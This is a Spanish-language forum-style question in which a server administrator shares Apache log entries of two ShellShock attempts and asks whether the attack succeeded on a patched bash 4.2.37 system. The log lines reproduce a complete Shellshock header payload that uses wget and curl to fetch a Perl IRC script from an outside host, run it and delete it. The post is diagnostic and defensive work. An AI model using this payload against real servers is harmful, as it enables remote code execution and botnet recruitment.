Al revisar los registros de mi servidor web, noté dos ataques ShellShock diferentes en mi servidor, los cuales generaron un código de respuesta HTTP 200 OK. Se ven así (dirección IP / fecha y hora de redacción):
223.252.35.159 - - [************] "GET / HTTP/1.1" 200 2203 "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/ ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \"" "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/ ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \""
Mi versión de bash es 4.2.37 y actualizamos este servidor regularmente a través de apt-get update && apt-get dist-upgrade
junto con el análisis diario del archivo de registro. Apache 2.2.22 se está utilizando y solo el puerto 80 está abierto. El archivo descargado parece ser una secuencia de comandos de IRC que solo puedo imaginar que se utiliza con fines de inundación en este contexto.
Intentando ejecutar x='() { :;}; echo VULNERABLE' bash -c :
(desde ¿Hay un comando corto para probar si mi servidor está seguro contra el error de bash shellshock? ) no devuelve nada pero ejecuta ps -p $$
desde un terminal SSH muestra un bash shell actualmente en uso.
La pregunta es: ¿es probable que la vulnerabilidad haya funcionado dado lo anterior?